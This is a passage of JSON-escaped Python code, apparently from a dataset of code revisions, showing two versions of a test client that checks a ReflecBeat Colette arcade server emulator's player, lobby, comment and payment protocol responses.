call = self.call_node()\n player = Node.void('player')\n 
player.set_attribute('method', 'start')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n player.add_child(Node.u16('gp', 10573))\n player.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/plyid')\n self.assert_path(resp, 'response/player/start_time')\n self.assert_path(resp, 'response/player/event_ctrl')\n self.assert_path(resp, 'response/player/item_lock_ctrl')\n self.assert_path(resp, 'response/player/lincle_link_4')\n self.assert_path(resp, 'response/player/jbrbcollabo')\n self.assert_path(resp, 'response/player/tricolettepark')\n\n def verify_player_delete(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_end(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_succeed(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/name')\n self.assert_path(resp, 'response/player/lv')\n self.assert_path(resp, 'response/player/exp')\n self.assert_path(resp, 'response/player/grd')\n self.assert_path(resp, 'response/player/ap')\n self.assert_path(resp, 'response/player/released')\n self.assert_path(resp, 'response/player/mrecord')\n\n def verify_player_read(self, refid: str, location: str) ->List[Dict[str,\n int]]:\n call = 
self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/pdata/account/usrid')\n self.assert_path(resp, 'response/player/pdata/account/tpc')\n self.assert_path(resp, 'response/player/pdata/account/dpc')\n self.assert_path(resp, 'response/player/pdata/account/crd')\n self.assert_path(resp, 'response/player/pdata/account/brd')\n self.assert_path(resp, 'response/player/pdata/account/tdc')\n self.assert_path(resp, 'response/player/pdata/account/intrvld')\n self.assert_path(resp, 'response/player/pdata/account/ver')\n self.assert_path(resp, 'response/player/pdata/account/pst')\n self.assert_path(resp, 'response/player/pdata/account/st')\n self.assert_path(resp, 'response/player/pdata/base/name')\n self.assert_path(resp, 'response/player/pdata/base/exp')\n self.assert_path(resp, 'response/player/pdata/base/lv')\n self.assert_path(resp, 'response/player/pdata/base/mg')\n self.assert_path(resp, 'response/player/pdata/base/ap')\n self.assert_path(resp, 'response/player/pdata/base/tid')\n self.assert_path(resp, 'response/player/pdata/base/tname')\n self.assert_path(resp, 'response/player/pdata/base/cmnt')\n self.assert_path(resp, 'response/player/pdata/base/uattr')\n self.assert_path(resp, 'response/player/pdata/base/hidden_param')\n self.assert_path(resp, 'response/player/pdata/base/tbs')\n self.assert_path(resp, 'response/player/pdata/base/tbs_r')\n self.assert_path(resp, 'response/player/pdata/rival')\n self.assert_path(resp, 'response/player/pdata/fav_music_slot')\n self.assert_path(resp, 'response/player/pdata/custom')\n self.assert_path(resp, 'response/player/pdata/config')\n self.assert_path(resp, 'response/player/pdata/stamp')\n self.assert_path(resp, 'response/player/pdata/released')\n 
self.assert_path(resp, 'response/player/pdata/record')\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.\n format(resp.child_value('player/pdata/base/name')))\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n score = {'id': child.child_value('mid'), 'chart': child.\n child_value('ntgrd'), 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'), 'score': child\n .child_value('scr'), 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms')}\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[\n str, int]]) ->int:\n call = self.call_node()\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 
0, 0,\n 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/uid')\n return resp.child_value('player/uid')\n\n def verify_lobby_read(self, location: str, extid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'read')\n lobby.add_child(Node.s32('uid', extid))\n lobby.add_child(Node.u8('m_grade', 255))\n lobby.add_child(Node.string('lid', location))\n lobby.add_child(Node.s32('max', 128))\n lobby.add_child(Node.s32_array('friend', []))\n 
lobby.add_child(Node.u8('var', 5))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n\n def verify_lobby_entry(self, location: str, extid: int) ->int:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n self.assert_path(resp, 'response/lobby/eid')\n self.assert_path(resp, 'response/lobby/e/eid')\n self.assert_path(resp, 'response/lobby/e/mid')\n self.assert_path(resp, 'response/lobby/e/ng')\n self.assert_path(resp, 'response/lobby/e/uid')\n self.assert_path(resp, 'response/lobby/e/uattr')\n self.assert_path(resp, 'response/lobby/e/pn')\n self.assert_path(resp, 'response/lobby/e/mg')\n self.assert_path(resp, 'response/lobby/e/mopt')\n self.assert_path(resp, 'response/lobby/e/tid')\n self.assert_path(resp, 'response/lobby/e/tn')\n self.assert_path(resp, 'response/lobby/e/topt')\n 
self.assert_path(resp, 'response/lobby/e/lid')\n self.assert_path(resp, 'response/lobby/e/sn')\n self.assert_path(resp, 'response/lobby/e/pref')\n self.assert_path(resp, 'response/lobby/e/stg')\n self.assert_path(resp, 'response/lobby/e/pside')\n self.assert_path(resp, 'response/lobby/e/eatime')\n self.assert_path(resp, 'response/lobby/e/ga')\n self.assert_path(resp, 'response/lobby/e/gp')\n self.assert_path(resp, 'response/lobby/e/la')\n self.assert_path(resp, 'response/lobby/e/ver')\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby')\n\n def verify_pzlcmt_read(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/comment/time')\n self.assert_path(resp, 'response/info/c/uid')\n self.assert_path(resp, 'response/info/c/name')\n self.assert_path(resp, 'response/info/c/icon')\n self.assert_path(resp, 'response/info/c/bln')\n self.assert_path(resp, 'response/info/c/tid')\n self.assert_path(resp, 'response/info/c/t_name')\n self.assert_path(resp, 'response/info/c/pref')\n self.assert_path(resp, 'response/info/c/time')\n self.assert_path(resp, 'response/info/c/comment')\n self.assert_path(resp, 'response/info/c/is_tweet')\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception(\"Invalid 
name '{}' returned for comment!\"\n .format(name))\n if comment != 'アメ〜〜!':\n raise Exception(\n \"Invalid comment '{}' returned for comment!\".format\n (comment))\n found = True\n if not found:\n raise Exception('Comment we posted was not found!')\n\n def verify_pzlcmt_write(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_write')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.string('name', self.NAME))\n info.add_child(Node.s16('icon', 0))\n info.add_child(Node.s8('bln', 0))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.string('t_name', ''))\n info.add_child(Node.s8('pref', 51))\n info.add_child(Node.s32('time', int(time.time())))\n info.add_child(Node.string('comment', 'アメ〜〜!'))\n info.add_child(Node.bool('is_tweet', True))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info')\n\n def verify_jbrbcollabo_save(self, refid: str) ->None:\n call = self.call_node()\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/jbrbcollabo')\n\n def verify(self, cardid: Optional[str]) ->None:\n self.verify_services_get(expected_services=['pcbtracker',\n 'pcbevent', 'local', 'message', 'facility', 'cardmng',\n 'package', 'posevent', 'pkglist', 'dlstatus', 'eacoin', 'lobby',\n 'ntp', 'keepalive'])\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print('Generated random card ID {} for use.'.format(card))\n if cardid is None:\n 
self.verify_cardmng_inquire(card, msg_type='unregistered',\n paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception(\n \"Invalid refid '{}' returned when registering card\".\n format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new',\n paseli_enabled=paseli_enabled):\n raise Exception(\n \"Invalid refid '{}' returned when querying card\".format\n (ref_id))\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(ref_id, location, [{'id': 0,\n 'chart': 0, 'clear_type': -1, 'achievement_rate': 0,\n 'score': 0, 'combo': 0, 'miss_count': 0}])\n else:\n print('Skipping new card checks for existing card')\n ref_id = self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled)\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled):\n raise Exception(\"Invalid refid '{}' returned when querying card\"\n .format(ref_id))\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n self.verify_jbrbcollabo_save(ref_id)\n if cardid is None:\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 2,\n 'achievement_rate': 7543, 'score': 432, 'combo': \n 123, 'miss_count': 5}, {'id': 1, 'chart': 0,\n 'clear_type': 4, 'achievement_rate': 9876, 'score':\n 543, 'combo': 543, 'miss_count': 0}, {'id': 3,\n 'chart': 2, 'clear_type': 2, 'achievement_rate': \n 1234, 'score': 123, 'combo': 42, 'miss_count': 54},\n {'id': 3, 'chart': 0, 'clear_type': 2,\n 'achievement_rate': 1024, 'score': 50, 'combo': 12,\n 'miss_count': 90}]\n if phase == 2:\n dummyscores = [{'id': 1, 'chart': 1, 
'clear_type': 3,\n 'achievement_rate': 8765, 'score': 469, 'combo': \n 468, 'miss_count': 1}, {'id': 1, 'chart': 0,\n 'clear_type': 2, 'achievement_rate': 8765, 'score':\n 432, 'combo': 321, 'miss_count': 15,\n 'expected_score': 543, 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876, 'expected_combo':\n 543, 'expected_miss_count': 0}]\n self.verify_player_write(ref_id, location, dummyscores)\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received[\n 'chart'] == expected['chart']:\n actual = received\n break\n if actual is None:\n raise Exception(\n \"Didn't find song {} chart {} in response!\".\n format(expected['id'], expected['chart']))\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected[\n 'expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate'\n ]\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n if actual['score'] != expected_score:\n raise Exception(\n \"Expected a score of '{}' for song '{}' chart '{}' but got score '{}'\"\n .format(expected_score, expected['id'],\n expected['chart'], actual['score']))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception(\n \"Expected an achievement rate of '{}' for song '{}' chart '{}' but got achievement rate '{}'\"\n .format(expected_achievement_rate, expected[\n 'id'], expected['chart'], actual[\n 
'achievement_rate']))\n if actual['clear_type'] != expected_clear_type:\n raise Exception(\n \"Expected a clear_type of '{}' for song '{}' chart '{}' but got clear_type '{}'\"\n .format(expected_clear_type, expected['id'],\n expected['chart'], actual['clear_type']))\n if actual['combo'] != expected_combo:\n raise Exception(\n \"Expected a combo of '{}' for song '{}' chart '{}' but got combo '{}'\"\n .format(expected_combo, expected['id'],\n expected['chart'], actual['combo']))\n if actual['miss_count'] != expected_miss_count:\n raise Exception(\n \"Expected a miss count of '{}' for song '{}' chart '{}' but got miss count '{}'\"\n .format(expected_miss_count, expected['id'],\n expected['chart'], actual['miss_count']))\n time.sleep(1)\n else:\n print('Skipping score checks for existing card')\n self.verify_player_end(ref_id)\n self.verify_info_ranking()\n if paseli_enabled:\n print('PASELI enabled for this PCBID, executing PASELI checks')\n else:\n print('PASELI disabled for this PCBID, skipping PASELI checks')\n return\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print('Skipping PASELI consume check because card has 0 balance')\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0,\n balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-5": "import random\nimport time\nfrom typing import Dict, List, Optional\n\nfrom bemani.client.base import BaseClient\nfrom bemani.protocol import Node\n\n\nclass ReflecBeatColette(BaseClient):\n NAME = 'TEST'\n\n def verify_pcb_boot(self, loc: str) -> None:\n call = self.call_node()\n\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/pcb/sinfo/nm\")\n self.assert_path(resp, \"response/pcb/sinfo/cl_enbl\")\n self.assert_path(resp, \"response/pcb/sinfo/cl_h\")\n self.assert_path(resp, \"response/pcb/sinfo/cl_m\")\n\n def verify_info_common(self) -> None:\n call = self.call_node()\n\n info = Node.void('info')\n info.set_attribute('method', 'common')\n call.add_child(info)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/info/event_ctrl\")\n self.assert_path(resp, \"response/info/item_lock_ctrl\")\n\n def verify_info_ranking(self) -> None:\n call = self.call_node()\n\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/info/ver\")\n self.assert_path(resp, \"response/info/ranking/weekly/bt\")\n self.assert_path(resp, \"response/info/ranking/weekly/et\")\n self.assert_path(resp, \"response/info/ranking/weekly/new/d/mid\")\n self.assert_path(resp, \"response/info/ranking/weekly/new/d/cnt\")\n self.assert_path(resp, \"response/info/ranking/monthly/bt\")\n self.assert_path(resp, \"response/info/ranking/monthly/et\")\n self.assert_path(resp, \"response/info/ranking/monthly/new/d/mid\")\n self.assert_path(resp, \"response/info/ranking/monthly/new/d/cnt\")\n self.assert_path(resp, 
\"response/info/ranking/total/bt\")\n self.assert_path(resp, \"response/info/ranking/total/et\")\n self.assert_path(resp, \"response/info/ranking/total/new/d/mid\")\n self.assert_path(resp, \"response/info/ranking/total/new/d/cnt\")\n\n def verify_player_start(self, refid: str) -> None:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'start')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n player.add_child(Node.u16('gp', 10573))\n player.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player/plyid\")\n self.assert_path(resp, \"response/player/start_time\")\n self.assert_path(resp, \"response/player/event_ctrl\")\n self.assert_path(resp, \"response/player/item_lock_ctrl\")\n self.assert_path(resp, \"response/player/lincle_link_4\")\n self.assert_path(resp, \"response/player/jbrbcollabo\")\n self.assert_path(resp, \"response/player/tricolettepark\")\n\n def verify_player_delete(self, refid: str) -> None:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player\")\n\n def verify_player_end(self, refid: str) -> None:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player\")\n\n def verify_player_succeed(self, refid: str) -> None:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 
'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player/name\")\n self.assert_path(resp, \"response/player/lv\")\n self.assert_path(resp, \"response/player/exp\")\n self.assert_path(resp, \"response/player/grd\")\n self.assert_path(resp, \"response/player/ap\")\n self.assert_path(resp, \"response/player/released\")\n self.assert_path(resp, \"response/player/mrecord\")\n\n def verify_player_read(self, refid: str, location: str) -> List[Dict[str, int]]:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player/pdata/account/usrid\")\n self.assert_path(resp, \"response/player/pdata/account/tpc\")\n self.assert_path(resp, \"response/player/pdata/account/dpc\")\n self.assert_path(resp, \"response/player/pdata/account/crd\")\n self.assert_path(resp, \"response/player/pdata/account/brd\")\n self.assert_path(resp, \"response/player/pdata/account/tdc\")\n self.assert_path(resp, \"response/player/pdata/account/intrvld\")\n self.assert_path(resp, \"response/player/pdata/account/ver\")\n self.assert_path(resp, \"response/player/pdata/account/pst\")\n self.assert_path(resp, \"response/player/pdata/account/st\")\n self.assert_path(resp, \"response/player/pdata/base/name\")\n self.assert_path(resp, \"response/player/pdata/base/exp\")\n self.assert_path(resp, \"response/player/pdata/base/lv\")\n self.assert_path(resp, \"response/player/pdata/base/mg\")\n self.assert_path(resp, \"response/player/pdata/base/ap\")\n self.assert_path(resp, \"response/player/pdata/base/tid\")\n 
self.assert_path(resp, \"response/player/pdata/base/tname\")\n self.assert_path(resp, \"response/player/pdata/base/cmnt\")\n self.assert_path(resp, \"response/player/pdata/base/uattr\")\n self.assert_path(resp, \"response/player/pdata/base/hidden_param\")\n self.assert_path(resp, \"response/player/pdata/base/tbs\")\n self.assert_path(resp, \"response/player/pdata/base/tbs_r\")\n self.assert_path(resp, \"response/player/pdata/rival\")\n self.assert_path(resp, \"response/player/pdata/fav_music_slot\")\n self.assert_path(resp, \"response/player/pdata/custom\")\n self.assert_path(resp, \"response/player/pdata/config\")\n self.assert_path(resp, \"response/player/pdata/stamp\")\n self.assert_path(resp, \"response/player/pdata/released\")\n self.assert_path(resp, \"response/player/pdata/record\")\n\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.format(resp.child_value('player/pdata/base/name')))\n\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n\n score = {\n 'id': child.child_value('mid'),\n 'chart': child.child_value('ntgrd'),\n 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'),\n 'score': child.child_value('scr'),\n 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms'),\n }\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[str, int]]) -> int:\n call = self.call_node()\n\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 
1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n 
log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player/uid\")\n return resp.child_value('player/uid')\n\n def verify_lobby_read(self, location: str, extid: int) -> None:\n call = self.call_node()\n\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'read')\n lobby.add_child(Node.s32('uid', extid))\n lobby.add_child(Node.u8('m_grade', 255))\n lobby.add_child(Node.string('lid', location))\n lobby.add_child(Node.s32('max', 128))\n lobby.add_child(Node.s32_array('friend', []))\n lobby.add_child(Node.u8('var', 5))\n call.add_child(lobby)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/lobby/interval\")\n self.assert_path(resp, \"response/lobby/interval_p\")\n\n def verify_lobby_entry(self, location: str, extid: int) -> int:\n call = self.call_node()\n\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n 
